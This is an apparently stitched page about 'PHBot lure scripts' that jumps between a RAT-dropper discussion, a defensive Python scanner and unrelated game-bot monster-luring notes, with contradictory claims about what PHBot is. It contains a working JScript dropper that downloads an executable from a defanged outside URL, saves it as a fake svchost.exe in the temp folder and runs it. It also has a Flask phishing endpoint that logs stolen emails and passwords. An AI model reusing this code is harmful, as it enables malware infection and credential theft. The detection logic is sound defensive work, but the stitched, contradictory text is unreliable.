
Phbot Lure Script

This is where the script mimics the "helper" archetype. The lurer claims a mutual friend has been scammed, and they want revenge.

While PHBot itself is a robust RAT, its lure script remains the most detectable stage of the kill chain. Obfuscation may slow down a casual user, but modern EDRs and email filters can fingerprint the behavioral patterns of these scripts: WebClient or WinHTTP downloads followed by a file write and process creation in temp directories.

For defenders, the message is clear: Block the lure, starve the bot. Invest in script-based detection, enforce Constrained Language Mode, and educate users to never enable macros or run unexpected .js files.

For researchers, reverse engineering PHBot lure scripts offers a window into the attacker's tradecraft. Catalog the C2 URLs, deobfuscate the base64 layers, and share the IOCs. Every lure script you sink is one PHBot that never wakes up.


Delivery: Email attachment named Invoice_#87345.js

Code snippet:

var url = "hxxp://platinumsoft[.]site/phbot.exe";                   // payload URL (defanged)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");   // stage 1: download via the WinHTTP COM object
WinHttpReq.Open("GET", url, false);
WinHttpReq.Send();
if (WinHttpReq.Status == 200) {
    var stream = new ActiveXObject("ADODB.Stream");                 // stage 2: write the response body to disk
    stream.Open();
    stream.Type = 1;                                                // adTypeBinary
    stream.Write(WinHttpReq.ResponseBody);
    stream.SaveToFile("%temp%\\svchost.exe", 2);                    // adSaveCreateOverWrite; name mimics a system process
    var shell = new ActiveXObject("WScript.Shell");                 // stage 3: launch the dropped binary
    shell.Run("%temp%\\svchost.exe");
}
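As an added example (not code from this page or from any PHBot-related project), the following Python scanner implements the two detection signals the page names for defenders: the WinHTTP download, ADODB.Stream write and WScript.Shell.Run chain pointed at a temp directory, and the high base64 ratio in short scripts. All three input samples are constructed; the grouping of COM ProgIDs into stages, the 40-character base64 run length and the 30% threshold are this example's assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample modelled on the dropper snippet above (URL kept defanged).
SAMPLE_LURE_JS = r'''
var url = "hxxp://platinumsoft[.]site/phbot.exe";
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", url, false);
WinHttpReq.Send();
if (WinHttpReq.Status == 200) {
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Open();
    stream.Type = 1;
    stream.Write(WinHttpReq.ResponseBody);
    stream.SaveToFile("%temp%\\svchost.exe", 2);
    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("%temp%\\svchost.exe");
}
'''

# Constructed: a short script that is mostly one base64 blob (the ratio/entropy pattern).
OBFUSCATED_JS = 'var p = "' + "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo" * 4 + '"; eval(atob(p));'

# Constructed: ordinary JavaScript that should trigger neither rule.
BENIGN_JS = r'''
function add(a, b) { return a + b; }
console.log(add(2, 3));
'''

# Stages of the download -> drop -> execute chain. The COM ProgIDs are real
# WSH/COM identifiers; grouping them into stages is this example's assumption.
STAGES = {
    "download": re.compile(r"WinHttp\.WinHttpRequest|MSXML2\.(Server)?XMLHTTP|Net\.WebClient", re.I),
    "write_to_disk": re.compile(r"ADODB\.Stream|SaveToFile", re.I),
    "execute": re.compile(r"WScript\.Shell|\.Run\(|ShellExecute", re.I),
    "temp_path": re.compile(r"%temp%|\\Temp\\", re.I),
}
CHAIN = {"download", "write_to_disk", "execute"}

# A run of 40+ base64-alphabet characters, optionally padded (assumed cutoff).
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def base64_ratio(text: str) -> float:
    """Fraction of the script's characters that sit inside long base64-looking runs."""
    if not text:
        return 0.0
    covered = sum(len(m.group(0)) for m in BASE64_RUN.finditer(text))
    return covered / len(text)


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded blobs push this well above plain source."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def scan_script(text: str, b64_threshold: float = 0.30) -> dict:
    """Flag a script when the full download/write/execute chain is present
    or when base64 runs dominate the file."""
    stages = [name for name, rx in STAGES.items() if rx.search(text)]
    ratio = base64_ratio(text)
    chain_complete = CHAIN <= set(stages)
    suspicious = chain_complete or ratio > b64_threshold
    return {
        "stages": stages,
        "chain_complete": chain_complete,
        "base64_ratio": round(ratio, 3),
        "entropy": round(shannon_entropy(text), 2),
        "verdict": "suspicious" if suspicious else "clean",
    }


if __name__ == "__main__":
    for label, src in [("lure", SAMPLE_LURE_JS), ("obfuscated", OBFUSCATED_JS), ("benign", BENIGN_JS)]:
        print(label, scan_script(src))
```

The stage check is deliberately a conjunction: a lone `WScript.Shell` reference is common in legitimate admin scripts, whereas download plus binary write plus launch in one short file is the pattern the page describes. The ratio rule catches the layered-base64 variants that hide the ProgIDs behind `eval`.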

The script needs to know how many monsters are currently following the player. This is usually done by iterating through the GetMonsters() or similar function to count entities targeting the player within a specific radius.

from flask import Flask, request

app = Flask(__name__)

@app.route('/verify', methods=['POST'])
def harvest():
    # Credential-harvesting endpoint: record the submitted pair, then bounce the victim to the real login page
    email = request.form.get('email')
    password = request.form.get('password')
    with open('stolen_logs.txt', 'a') as f:
        f.write(f"{email}:{password}\n")
    return "<script>window.location='https://login.microsoftonline.com'</script>"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context='adhoc')


  • Entropy: High base64 ratio in short scripts (often >30% of file).
  • As of 2025, PHBot itself is largely deprecated due to Jagex’s client updates and the rise of AI-driven bot detection. However, the concept of the lure script has evolved.

    Modern lures are moving to:

    The "PHBot lure script" is no longer just a file. It is a blueprint for automated social engineering.

    Lure scripts typically use a "Home" coordinate (the party spot) and a list of "Lure" coordinates (the outer perimeter). The script must calculate distance to determine when to stop luring and return home.